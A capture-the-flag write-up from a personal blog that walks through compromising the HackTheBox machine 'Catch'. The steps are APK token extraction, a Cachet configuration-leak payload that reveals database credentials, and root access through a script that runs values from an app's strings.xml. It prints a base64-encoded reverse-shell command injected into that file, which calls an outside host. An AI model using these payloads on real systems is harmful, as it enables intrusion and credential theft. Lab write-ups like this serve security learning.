Close
Menu

Catch – HackTheBox Writeup

, , , , , , , , , , , , , , , 0

Catch

Machine Name: Catch
IP: 10.10.11.150
Difficulty: Medium

Summary

Catch is a machine that requires reverse engineering an APK, enumerating for information in the APK file and finding API tokens. Using the tokens, we login to a dashboard which is vulnerable to injection that leads to leaking SSH credentials. These credentials are used to get the user shell. Escalating Privileges involves monitoring processes and finding a script that allows the user to inject payloads and execute them as root.

Information Gathering

Nmap scan shows that four ports are open. SSH, 80 running Apache (2.4.41), 3000 (Gitea), and 8000 running Apache (2.4.29). I also added “catch.htb” to the hosts file.

“catch.htb” is the home page of Catch Global Systems. The page tells us that “Lets-chat/Gitea” integration will be included in the future enhancements.

By clicking the “Download Now” button, we get an APK named “catchv1.0.apk”.

Navigating to “catch.htb:3000/” shows the Gitea page and tells us that the version is 1.14.1.

We can get the same information from the manifest shown in nmap for port 3000. It is in base64 format.

I added “gitea.catch.htb:3000” to the hosts file and navigating to it shows the same page as “catch.htb:3000/”.

The lead here would be the APK file. So I went ahead and installed it in Nox. It showed an error message.

Another sub-domain, “https://status.catch.htb/”. After adding that to the hosts file and navigating to it, the page was same as “catch.htb/”.

“status.catch.htb:5000/” redirects us to a login page for Let’s Chat, “http://status.catch.htb:5000/login”.

Next, I analysed the APK file using MobSF and found some tokens in the “reconnaissance>hardcoded-secrects” tab.

Enumerating further, I found that “http://status.catch.htb:8000/” is running Cachet.

I looked up the Let’s Chat API on github and found that the authentication token is used as bearer. I captured the request of “status.catch.htb:5000/” on burp and added the authorization header.

We can request “/rooms” as per the Let’s Chat API.

The response shows that there are three rooms. We can now request messages from those rooms. There was a conversation about adding SSL, and a user sends some credentials on the chat!

These credentials worked on the “status.catch.htb:8000/” login page.

It presented the Cachet dashboard. Whenever I get access to any dashboard, I look for settings and features that allow me to run code. There wasn’t any such page but looking into the log located at Settings>Log, we find that it is running laravel PHP framework and the Cachet version is 2.4.0-dev.

With the name of the box being “Catch”, this must be the way to getting a shell.

Gaining User Shell

Googling “cachet 2.4.0-dev exploit”, the first result was helpful. The vulnerability here is Configuration leak. Since we can write into the “.env” file, and one of the environment variables is displayed in the “Mail from Host” field, we could grab sensitive information such as credentials. The PoC is quite simple. We need to save the payloads in the “Mail from Host” field and look at the same field after refreshing the page.

Using “$DB_USERNAME” as payload, we obtain the user “Will”.

Let’s grab the password as well using the payload “$DB_PASSWORD”.

The credentials worked for the open SSH port and I could capture the user flag.

Privilege Escalation

I ran “sudo -l” first and didn’t find any commands that could be run as root by Will. LinPeas didn’t find anything of importance to escalate privileges. I ran “pspy64” to monitor the processes and found a script named “verify.sh” running as root.

Taking a closer look at the script, we find that the function “app_check” retrieves a value from the file “/res/values/strings.xml” and executes it. We could inject a reverse shell payload here.

First, I decompiled the APK using apktool.

Next, I encoded the reverse shell payload into base64.

Then, I added the base64 encoded payload in the “catchv1.0/res/values/strings.xml” file.

<string name="app_name">Catch;echo -n "L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTYuMjIvMTIzNCAwPCYxIDI+JjE="|base64 -d|bash -i </string>

To recompile the folder into an APK, the existing apktool binary in Kali does not work. Use the “apktool_2.6.1.jar” file.

Pwned! Got root!

Thoviti Siddharth

I'm passionate about cybersecurity, machine learning, machine vision, web development. ​Welcome to my website! I write about my computer science experiments and thoughts that drive me to write.

→ Thoviti Siddharth

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *